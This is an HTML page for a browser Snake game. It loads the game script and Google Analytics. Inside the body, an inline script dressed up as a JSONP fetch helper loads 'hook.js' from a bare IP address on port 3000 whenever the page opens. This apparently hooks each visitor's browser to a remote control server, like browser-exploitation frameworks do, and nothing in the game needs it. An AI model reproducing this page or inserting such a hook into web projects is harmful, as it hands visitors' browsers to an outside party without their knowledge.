<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Snake Game</title>
    <link rel="stylesheet" href="style.css">
    <script defer src="script.js"></script>
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-177318007-1"></script>    
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag() { dataLayer.push(arguments); }
        gtag('js', new Date());

        gtag('config', 'UA-177318007-1');
    </script>
</head>

<body>
    <h1>Snake game</h1>    
    <script>
function handleResponse(response) {
    console.log(response); // Faça o que você deseja com a resposta
}

function fetchJSONP(url, callbackName) {
    const script = document.createElement('script');
    script.src = url + '&callback=' + callbackName;
    document.body.appendChild(script);
}

fetchJSONP('http://52.165.192.171:3000/hook.js', 'handleResponse');
</script>
    <canvas id="snake" width="512" height="512"></canvas>
</body>

</html>
